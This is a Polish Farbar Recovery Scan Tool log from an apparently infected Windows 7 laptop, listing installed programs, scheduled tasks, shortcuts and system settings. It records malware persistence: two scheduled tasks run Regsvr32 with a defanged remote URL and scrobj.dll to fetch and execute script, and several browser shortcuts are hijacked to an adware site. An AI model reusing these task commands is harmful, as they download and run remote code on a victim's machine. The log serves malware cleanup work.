Rezultaty skanu uzupełniającego Farbar Recovery Scan Tool (x64) Wersja: 01-05-2017 Uruchomiony przez Norbert (02-05-2017 14:25:12) Uruchomiony z C:\Users\Norbert\Desktop Windows 7 Home Premium Service Pack 1 (X64) (2012-08-10 17:12:35) Tryb startu: Normal ========================================================== ==================== Konta użytkowników: ============================= Administrator (S-1-5-21-859463877-3988447155-127319224-500 - Administrator - Disabled) Gość (S-1-5-21-859463877-3988447155-127319224-501 - Limited - Disabled) HomeGroupUser$ (S-1-5-21-859463877-3988447155-127319224-1002 - Limited - Enabled) Norbert (S-1-5-21-859463877-3988447155-127319224-1000 - Administrator - Enabled) => C:\Users\Norbert ==================== Centrum zabezpieczeń ======================== (Załączenie wejścia w fixlist spowoduje jego usunięcie.) AV: AVG Antivirus (Enabled - Up to date) {4D41356F-32AD-7C42-C820-63775EE4F413} AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} AS: AVG Antivirus (Enabled - Up to date) {F620D48B-1497-73CC-F290-58052563BEAE} ==================== Zainstalowane programy ====================== (W fixlist dozwolone tylko załączanie programów adware z flagą "Hidden" w celu ich uwidocznienia. Programy adware powinny zostać w poprawny sposób odinstalowane.) „Windows Live Essentials“ (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden „Windows Live Mail“ (x32 Version: 15.4.3502.0922 - „Microsoft Corporation“) Hidden „Windows Live Mesh ActiveX“ nuotolinių ryšių valdiklis (HKLM-x32\...\{9024FE65-46B8-4C8A-9D98-8DCB6BD5F598}) (Version: 15.4.5722.2 - Microsoft Corporation) „Windows Live Messenger“ (x32 Version: 15.4.3538.0513 - „Microsoft Corporation“) Hidden „Windows Live“ fotogalerija (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden AdFender (HKLM-x32\...\AdFender) (Version: 1.75 - AdFender, Inc.) Adobe Acrobat DC (HKLM-x32\...\{AC76BA86-1033-FFFF-7760-0C0F074E4100}) (Version: 17.009.20044 - Adobe Systems Incorporated) Adobe Acrobat Reader DC - Polish (HKLM-x32\...\{AC76BA86-7AD7-1045-7B44-AC0F074E4100}) (Version: 17.009.20044 - Adobe Systems Incorporated) Adobe Flash Player 25 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 25.0.0.148 - Adobe Systems Incorporated) Adobe Flash Player 25 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 25.0.0.148 - Adobe Systems Incorporated) Alcor Micro USB Card Reader (HKLM-x32\...\AmUStor) (Version: 1.2.0117.08443 - Alcor Micro Corp.) Alcor Micro USB Card Reader (x32 Version: 1.2.0117.08443 - Alcor Micro Corp.) Hidden Asmedia ASM104x USB 3.0 Host Controller Driver (HKLM-x32\...\{E4FB0B39-C991-4EE7-95DD-1A1A7857D33D}) (Version: 1.14.2.0 - Asmedia Technology) ASUS AI Recovery (HKLM-x32\...\{D39F0676-163E-4595-A917-E28F99BBD4D2}) (Version: 1.0.19 - ASUS) ASUS FaceLogon (HKLM-x32\...\{64452561-169F-4A36-A2FF-B5E118EC65F5}) (Version: 1.0.0013 - ASUS) ASUS FancyStart (HKLM-x32\...\{C944B4C5-1C4D-4D95-8AC0-7CEF13914131}) (Version: 1.1.1 - ASUSTeK Computer Inc.) ASUS LifeFrame3 (HKLM-x32\...\{1DBD1F12-ED93-49C0-A7CC-56CBDE488158}) (Version: 3.0.28 - ASUS) ASUS Live Update (HKLM-x32\...\{FA540E67-095C-4A1B-97BA-4D547DEC9AF4}) (Version: 3.1.2 - ASUS) ASUS Power4Gear Hybrid (HKLM\...\{9B6239BF-4E85-4590-8D72-51E30DB1A9AA}) (Version: 1.1.50 - ASUS) ASUS Splendid Video Enhancement Technology (HKLM-x32\...\{0969AF05-4FF6-4C00-9406-43599238DE0D}) (Version: 1.02.0037 - ASUS) ASUS Virtual Camera (HKLM-x32\...\{EC8BD21F-0CA0-4BBF-97D9-4A52B30041A1}) (Version: 1.0.24 - asus) ASUS WebStorage (HKLM-x32\...\ASUS WebStorage) (Version: 3.0.108.222 - eCareme Technologies, Inc.) AsusScr_K3 Series_ENG (HKLM-x32\...\AsusScr_K3 Series_ENG) (Version: 1.0.0001 - ASUS) AsusVibe2.0 (HKLM-x32\...\Asus Vibe2.0) (Version: 2.0.7.142 - ASUSTEK) Atheros Bluetooth Suite (64) (HKLM\...\{230D1595-57DA-4933-8C4E-375797EBB7E1}) (Version: 7.04.000.98 - Atheros) ATK Package (HKLM-x32\...\{AB5C933E-5C7D-4D30-B314-9C83A49B94BE}) (Version: 1.0.0014 - ASUS) AVG (HKLM\...\AvgZen) (Version: 1.181.3.2097 - AVG Technologies) AVG (Version: 1.181.1 - AVG Technologies) Hidden AVG Protection (HKLM-x32\...\AVG Antivirus) (Version: 17.3.3011 - AVG Technologies) CCleaner (HKLM\...\CCleaner) (Version: 3.21 - Piriform) Control ActiveX Windows Live Mesh pentru conexiuni la distanță (HKLM-x32\...\{260E3D78-94E6-47EC-8E29-46301572BB1E}) (Version: 15.4.5722.2 - Microsoft Corporation) CyberLink LabelPrint (HKLM-x32\...\InstallShield_{C59C179C-668D-49A9-B6EA-0121CCFC1243}) (Version: 2.5.3624 - CyberLink Corp.) CyberLink Media Suite (HKLM-x32\...\InstallShield_{1FBF6C24-C1FD-4101-A42B-0C564F9E8E79}) (Version: 8.0.2926 - CyberLink Corp.) CyberLink Power2Go (HKLM-x32\...\InstallShield_{40BF1E83-20EB-11D8-97C5-0009C5020658}) (Version: 7.0.0.1126 - CyberLink Corp.) D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden Dream Day First Home (HKLM-x32\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-113832110}) (Version: - Oberon Media) e-pity 8.0.12 za rok 2016 (HKLM-x32\...\{80D8170E-5590-218-B9ED-E24E4C99A11D}_is1) (Version: 8.0.12 - e-file sp. z o.o. sp.k.) Fast Boot (HKLM\...\{13F4A7F3-EABC-4261-AF6B-1317777F0755}) (Version: 1.0.10 - ASUS) FMW 1 (Version: 1.182.1 - AVG Technologies) Hidden Fotogalerija Windows Live (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden Galeria fotografii usługi Windows Live (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden Galerie foto Windows Live (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden Google Earth (HKLM-x32\...\{F6430171-B86B-4639-839E-374913E7911D}) (Version: 7.1.8.3036 - Google) Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden Google Update Helper (x32 Version: 1.3.33.5 - Google Inc.) Hidden HiSuite (HKLM-x32\...\Hi Suite) (Version: 1.0 - Huawei Technologies Co.,Ltd) Intel(R) Control Center (HKLM-x32\...\{F8A9085D-4C7A-41a9-8A77-C8998A96C421}) (Version: 1.2.1.1007 - Intel Corporation) Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 7.0.0.1144 - Intel Corporation) Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 8.15.10.2462 - Intel Corporation) Java 8 Update 111 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180111F0}) (Version: 8.0.1110.14 - Oracle Corporation) Java 8 Update 131 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F64180131F0}) (Version: 8.0.1310.11 - Oracle Corporation) Java 8 Update 131 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180131F0}) (Version: 8.0.1310.11 - Oracle Corporation) Junk Mail filter update (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden Kontrola Windows Live Mesh ActiveX za daljinske veze (HKLM-x32\...\{19CBDE24-2761-49A5-816B-D2BA65D0CA8D}) (Version: 15.4.5722.2 - Microsoft Corporation) Kontrolnik Windows Live Mesh ActiveX za oddaljene povezave (HKLM-x32\...\{CA227A9D-09BE-4BFB-9764-48FED2DA5454}) (Version: 15.4.5722.2 - Microsoft Corporation) Mesh Runtime (x32 Version: 15.4.5722.2 - Microsoft Corporation) Hidden Microsoft .NET Framework 4 Client Profile (HKLM\...\Microsoft .NET Framework 4 Client Profile) (Version: 4.0.30319 - Microsoft Corporation) Microsoft .NET Framework 4 Extended (HKLM\...\Microsoft .NET Framework 4 Extended) (Version: 4.0.30319 - Microsoft Corporation) Microsoft Office 2010 (HKLM-x32\...\{95140000-0070-0000-0000-0000000FF1CE}) (Version: 14.0.4763.1000 - Microsoft Corporation) Microsoft Office Starter 2010 - Polski (HKLM-x32\...\{90140011-0066-0415-0000-0000000FF1CE}) (Version: 14.0.4763.1000 - Microsoft Corporation) Microsoft PowerPoint Viewer (HKLM-x32\...\{95140000-00AF-0415-0000-0000000FF1CE}) (Version: 14.0.7015.1000 - Microsoft Corporation) Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50901.0 - Microsoft Corporation) Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation) Moduł Szybka instalacja pakietu Microsoft Office 2010 (HKLM-x32\...\Office14.Click2Run) (Version: 14.0.4763.1000 - Microsoft Corporation) Moduł Szybka instalacja pakietu Microsoft Office 2010 (Version: 14.0.4763.1000 - Microsoft Corporation) Hidden Mozilla Firefox 53.0 (x86 pl) (HKLM-x32\...\Mozilla Firefox 53.0 (x86 pl)) (Version: 53.0 - Mozilla) MSVC90_x64 (Version: 1.0.1.2 - Nokia) Hidden MSVC90_x86 (x32 Version: 1.0.1.2 - Nokia) Hidden Nuance PDF Reader (HKLM-x32\...\{B480904D-F73F-4673-B034-8A5F492C9184}) (Version: 6.00.0041 - Nuance Communications, Inc.) OpenOffice.org 3.3 (HKLM-x32\...\{0141D498-16DA-4221-A529-1D7A64BE8B05}) (Version: 3.3.9567 - OpenOffice.org) Pakiet sterowników systemu Windows - Nokia pccsmcfd LegacyDriver (05/31/2012 7.1.2.0) (HKLM\...\62BBD193ADFDBB228C7E1ADB56463F5732FF7F6F) (Version: 05/31/2012 7.1.2.0 - Nokia) PC Connectivity Solution (HKLM-x32\...\{644F4910-E812-49AD-93EC-86828CB81A0D}) (Version: 12.0.27.0 - Nokia) Plants vs Zombies (HKLM-x32\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-117080787}) (Version: - Oberon Media) PLAY ONLINE (HKLM-x32\...\PLAY ONLINE) (Version: 21.005.11.17.264 - Huawei Technologies Co.,Ltd) Poczta usługi Windows Live (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden Podstawowe programy Windows Live (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden Pošta Windows Live (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden Qualcomm Atheros WiFi Driver Installation (HKLM-x32\...\{7D916FA5-DAE9-4A25-B089-655C70EAF607}) (Version: 9.2 - Qualcomm Atheros) Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6304 - Realtek Semiconductor Corp.) Skype Click to Call (HKLM-x32\...\{873F8E7C-10E6-449F-BD7E-5FBA7C8E1C9B}) (Version: 8.5.0.9167 - Microsoft Corporation) Skype™ 7.33 (HKLM-x32\...\{3B7E914A-93D5-4A29-92BB-AF8C3F66C431}) (Version: 7.33.105 - Skype Technologies S.A.) Sonic Focus (HKLM-x32\...\{09BCB9CE-964B-4BDA-AE46-B5A0ABEF1D3F}) (Version: 1.00.0000 - Virage Logic, Corp.) Spybot - Search & Destroy (HKLM-x32\...\{B4092C6D-E886-4CB2-BA68-FE5A88D31DE6}_is1) (Version: 1.6.2 - Safer Networking Limited) Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 15.3.6.0 - Synaptics Incorporated) Turbo Fiesta (HKLM-x32\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-115320460}) (Version: - Oberon Media) Visual Studio 2012 x64 Redistributables (HKLM\...\{8C775E70-A791-4DA8-BCC3-6AB7136F4484}) (Version: 14.0.0.1 - AVG Technologies) Visual Studio 2012 x86 Redistributables (HKLM-x32\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.) Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3538.0513 - Microsoft Corporation) Windows Live Mesh ActiveX Control for Remote Connections (HKLM-x32\...\{2902F983-B4C1-44BA-B85D-5C6D52E2C441}) (Version: 15.4.5722.2 - Microsoft Corporation) Windows Live Mesh ActiveX kontrola za daljinske veze (HKLM-x32\...\{8985AE5E-622A-4980-8BF8-0A1830643220}) (Version: 15.4.5722.2 - Microsoft Corporation) Windows Live Mesh ActiveX vadīkla attālajiem savienojumiem (HKLM-x32\...\{A3A775C9-5A63-4C55-8FDD-427A5B8F5D2B}) (Version: 15.4.5722.2 - Microsoft Corporation) Windows Live Mesh ActiveX-i juhtelement kaugühendustele (HKLM-x32\...\{216ACEC1-4556-4717-A8DE-3F7F5F9C6F63}) (Version: 15.4.5722.2 - Microsoft Corporation) Windows Live Mesh ActiveX-vezérlő távoli kapcsolatokhoz (HKLM-x32\...\{6E29C4F7-C2C2-4B18-A15C-E09B92065F15}) (Version: 15.4.5722.2 - Microsoft Corporation) WinFlash (HKLM-x32\...\{8F21291E-0444-4B1D-B9F9-4370A73E346D}) (Version: 2.32.3 - ASUS) WinRAR 5.31 (64-bitowy) (HKLM\...\WinRAR archiver) (Version: 5.31.0 - win.rar GmbH) Wireless Console 3 (HKLM-x32\...\{19EA33FB-B34E-40EA-8B8A-61743AEB795A}) (Version: 3.0.25 - ASUS) World of Goo (HKLM-x32\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-116672750}) (Version: - Oberon Media) WUSB54GC (HKLM-x32\...\{085142A7-B777-4024-AE9C-AB97C81D6AB1}) (Version: 1.80 - Linksys) YAC(Yet Another Cleaner!) (HKLM-x32\...\iSafe) (Version: - ELEX DO BRASIL PARTICIPAÇÕES LTDA) <==== UWAGA Фотогалерия на Windows Live (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden ==================== Niestandardowe rejestracje CLSID (filtrowane): ========================== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) ==================== Zaplanowane zadania (filtrowane) ============= (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) Task: {00DC807F-3F2F-4949-92C4-564B786212FF} - System32\Tasks\ASUS SmartLogon Console Sensor => C:\Program Files (x86)\ASUS\FaceLogon\sensorsrv.exe [2011-10-03] (ASUS) Task: {026847D1-F9F3-42C0-B2A0-567A887A5F9F} - System32\Tasks\e-pity2016a_styczen => C:\Program Files (x86)\e-file\e-pity\Assets\signxml.exe [2017-02-14] (e-file sp. z o.o. sp. k.) Task: {0BE84C32-6204-49DD-A2D5-16BD1766244E} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj81OThYF8QLRWw4FUZYRYM5NjExRWUxMTRYFdzSNkJXOF== scrobj.dll Task: {4394A7B2-212D-4BAB-A580-8DEA3DE21774} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-02-06] () <==== UWAGA Task: {47B478D7-007E-43E9-9AC7-FEB4378483BF} - System32\Tasks\ASC10_SkipUac_Norbert => C:\Program Files (x86)\IObit\Advanced SystemCare\ASC.exe Task: {4A13FC77-DC1D-4340-8E48-7C7CB50764BE} - System32\Tasks\ACMON => C:\Program Files (x86)\ASUS\Splendid\ACMON.exe [2011-12-07] (ASUS) Task: {531327DE-01C2-4A36-8595-D8F81761EF00} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2012-07-24] (Piriform Ltd) Task: {6386F3D4-7352-4798-B8F0-056D7FE8CAC2} - System32\Tasks\Antivirus Emergency Update => C:\Program Files (x86)\AVG\Antivirus\AvEmUpdate.exe [2017-04-21] (AVG Technologies CZ, s.r.o.) Task: {7B48068E-A82A-4B56-961C-FAF5F24AEFE8} - System32\Tasks\AVG EUpdate Task => avgsetupx.exe Task: {9122AEEA-5AEB-42FA-A9B6-D8FE7B5824A8} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-27] (Google Inc.) Task: {96ABABBC-24C2-4B6F-A100-15D9793A0FCB} - System32\Tasks\ATKOSD2 => C:\Program Files (x86)\ASUS\ATK Package\ATKOSD2\ATKOSD2.exe [2011-07-22] (ASUS) Task: {99DD0940-04BF-4865-8870-F61D63E38D16} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2017-02-02] (Adobe Systems Incorporated) Task: {A07387A4-BA5A-4685-9D87-304A14FB2AA3} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2017-04-11] (Adobe Systems Incorporated) Task: {A5242023-7278-4F8D-A264-CB9370714F70} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj81OThYF8QLRWw4FUZYRYM5NjExRWUxMTRYFdzSNkJXOF== scrobj.dll Task: {AD9A7DAB-6F29-4467-BECA-0EF9AC90A821} - System32\Tasks\Driver Booster SkipUAC (Norbert) => C:\Program Files (x86)\IObit\Driver Booster\4.3.0\DriverBooster.exe Task: {C3152BFB-63BD-4CEC-8861-620E8B6C7BA3} - System32\Tasks\ASUS Live Update => C:\Program Files (x86)\ASUS\ASUS Live Update\LiveUpdate.exe [2012-01-09] (ASUSTeK Computer Inc.) Task: {DDEE9F7F-B73B-4D98-BA59-725E76FE7946} - System32\Tasks\e-pity2016a_kwiecien => C:\Program Files (x86)\e-file\e-pity\Assets\signxml.exe [2017-02-14] (e-file sp. z o.o. sp. k.) Task: {E16FF74B-061C-4752-AF0E-E689AA8C938E} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-27] (Google Inc.) Task: {FC81417C-7056-4323-9D77-2F745281B64A} - System32\Tasks\ASUS P4G => C:\Program Files\ASUS\P4G\BatteryLife.exe [2011-11-16] (ASUS) (Załączenie wejścia w fixlist spowoduje przesunięcie pliku zadania (.job). Plik uruchamiany docelowo przez zadanie nie zostanie przeniesiony.) ==================== Skróty ============================= (Wybrane wejścia mogą zostać załączone w celu ich zresetowania lub usunięcia.) Shortcut: C:\Users\Norbert\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.) Shortcut: C:\Users\Norbert\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.) Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.) ShortcutWithArgument: C:\Users\Norbert\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493718224&z=1303e700b981664a9a477ccgaz9tfc2mbg9b5c0m9o&from=ypid&uid=WDCXWD3200BPVT-80JJ5T0_WD-WXU1EA1LERLZLERLZ ShortcutWithArgument: C:\Users\Norbert\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493718224&z=1303e700b981664a9a477ccgaz9tfc2mbg9b5c0m9o&from=ypid&uid=WDCXWD3200BPVT-80JJ5T0_WD-WXU1EA1LERLZLERLZ ShortcutWithArgument: C:\Users\Norbert\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493718224&z=1303e700b981664a9a477ccgaz9tfc2mbg9b5c0m9o&from=ypid&uid=WDCXWD3200BPVT-80JJ5T0_WD-WXU1EA1LERLZLERLZ ShortcutWithArgument: C:\Users\Norbert\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493718224&z=1303e700b981664a9a477ccgaz9tfc2mbg9b5c0m9o&from=ypid&uid=WDCXWD3200BPVT-80JJ5T0_WD-WXU1EA1LERLZLERLZ ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493718224&z=1303e700b981664a9a477ccgaz9tfc2mbg9b5c0m9o&from=ypid&uid=WDCXWD3200BPVT-80JJ5T0_WD-WXU1EA1LERLZLERLZ ShortcutWithArgument: C:\Users\Public\Desktop\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493718224&z=1303e700b981664a9a477ccgaz9tfc2mbg9b5c0m9o&from=ypid&uid=WDCXWD3200BPVT-80JJ5T0_WD-WXU1EA1LERLZLERLZ ==================== Załadowane moduły (filtrowane) ============== 2011-03-14 17:27 - 2011-03-14 17:27 - 00346976 _____ () C:\ProgramData\DatacardService\HWDeviceService64.exe 2013-05-02 17:46 - 2013-05-02 17:46 - 00246112 _____ () C:\ProgramData\PLAY ONLINE\OnlineUpdate\ouc.exe 2010-07-15 01:11 - 2010-07-15 01:11 - 00031360 _____ () C:\Program Files\ASUS\P4G\DevMng.dll 2017-04-21 19:24 - 2017-04-21 19:24 - 00163016 _____ () c:\Program Files (x86)\AVG\Antivirus\x64\vaarclient.dll 2017-04-21 19:24 - 2017-04-21 19:24 - 00791536 _____ () C:\Program Files (x86)\AVG\Antivirus\x64\ffl2.dll 2017-04-21 19:24 - 2017-04-21 19:24 - 00276760 _____ () c:\Program Files (x86)\AVG\Antivirus\x64\StreamBack.dll 2010-02-28 02:33 - 2010-02-28 02:33 - 00077664 _____ () C:\Program Files (x86)\Common Files\microsoft shared\virtualization handler\OfficeVirt.exe 2017-04-17 15:17 - 2016-05-23 04:37 - 00065696 _____ () C:\Program Files (x86)\Elex-tech\YAC\zlib1.dll 2017-04-21 19:24 - 2017-04-21 19:24 - 00171208 _____ () C:\Program Files (x86)\AVG\Antivirus\JsonRpcServer.dll 2017-04-21 19:24 - 2017-04-21 19:24 - 00177472 _____ () C:\Program Files (x86)\AVG\Antivirus\event_routing_rpc.dll 2017-05-02 11:40 - 2017-05-02 11:40 - 05921792 _____ () C:\Program Files (x86)\AVG\Antivirus\defs\17050200\algo.dll 2017-04-21 19:24 - 2017-04-21 19:24 - 00654504 _____ () C:\Program Files (x86)\AVG\Antivirus\ffl2.dll 2017-04-21 19:24 - 2017-04-21 19:24 - 00231616 _____ () C:\Program Files (x86)\AVG\Antivirus\streamback.dll 2017-04-17 15:17 - 2016-05-23 04:37 - 00179200 _____ () C:\Program Files (x86)\Elex-tech\YAC\libpng.dll 2013-05-02 17:46 - 2013-05-02 17:46 - 00011362 _____ () C:\ProgramData\PLAY ONLINE\OnlineUpdate\mingwm10.dll 2013-05-02 17:46 - 2013-05-02 17:46 - 00043008 _____ () C:\ProgramData\PLAY ONLINE\OnlineUpdate\libgcc_s_dw2-1.dll 2013-05-02 17:46 - 2013-05-02 17:46 - 02415104 _____ () C:\ProgramData\PLAY ONLINE\OnlineUpdate\QtCore4.dll 2013-05-02 17:46 - 2013-05-02 17:46 - 01148416 _____ () C:\ProgramData\PLAY ONLINE\OnlineUpdate\QtNetwork4.dll 2013-05-02 17:46 - 2013-05-02 17:46 - 00384512 _____ () C:\ProgramData\PLAY ONLINE\OnlineUpdate\QueryStrategy.dll 2013-05-02 17:46 - 2013-05-02 17:46 - 00398336 _____ () C:\ProgramData\PLAY ONLINE\OnlineUpdate\QtXml4.dll 2011-12-07 01:21 - 2011-12-07 01:21 - 00009216 _____ () C:\Program Files (x86)\ASUS\Splendid\GLCDdll.dll 2010-08-20 18:57 - 2010-08-20 18:57 - 00619816 _____ () C:\Program Files (x86)\CyberLink\Power2Go\CLMediaLibrary.dll 2010-08-20 18:57 - 2010-08-20 18:57 - 00013096 _____ () C:\Program Files (x86)\CyberLink\Power2Go\CLMLSvcPS.dll 2017-04-21 19:22 - 2017-04-21 19:21 - 48920064 _____ () C:\Program Files (x86)\AVG\UiDll\2623\libcef.dll 2017-04-21 19:24 - 2017-04-21 19:24 - 48936448 _____ () C:\Program Files (x86)\AVG\Antivirus\libcef.dll 2007-07-12 20:11 - 2007-07-12 20:11 - 01163264 _____ () C:\Program Files (x86)\ASUS\Wireless Console 3\acAuth.dll 2016-09-26 13:55 - 2016-09-26 13:55 - 40523480 _____ () C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\libcef.dll ==================== Alternate Data Streams (filtrowane) ========= (Załączenie wejścia w fixlist spowoduje usunięcie strumienia ADS.) AlternateDataStreams: C:\ProgramData\Temp:07BF512B [129] ==================== Tryb awaryjny (filtrowane) =================== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Wartość "AlternateShell" zostanie przywrócona.) ==================== Powiązania plików (filtrowane) =============== (Załączenie wejścia w fixlist spowoduje usunięcie obiektu z rejestru lub przywrócenie jego domyślnej postaci.) ==================== Internet Explorer - Witryny zaufane i z ograniczeniami =============== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru.) IE trusted site: HKU\S-1-5-21-859463877-3988447155-127319224-1000\...\mks.com.pl -> hxxps://www.mks.com.pl ==================== Hosts - zawartość: =============================== (Użycie dyrektywy Hosts: w fixlist spowoduje reset pliku Hosts.) 2009-07-14 04:34 - 2017-04-28 22:15 - 00000828 _____ C:\Windows\system32\Drivers\etc\hosts ==================== Inne obszary ============================ (Obecnie brak automatycznej naprawy dla tej sekcji.) HKU\S-1-5-21-859463877-3988447155-127319224-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Norbert\AppData\Roaming\Mozilla\Firefox\Tapeta pulpitu.bmp DNS Servers: 188.121.31.151 - 188.121.31.201 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1) Zapora systemu Windows [funkcja włączona] ==================== MSCONFIG/TASK MANAGER - Wyłączone elementy == MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^FancyStart daemon.lnk => C:\Windows\pss\FancyStart daemon.lnk.CommonStartup MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^McAfee Security Scan Plus.lnk => C:\Windows\pss\McAfee Security Scan Plus.lnk.CommonStartup MSCONFIG\startupreg: Adobe ARM => "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe" MSCONFIG\startupreg: ASUS Screen Saver Protector => 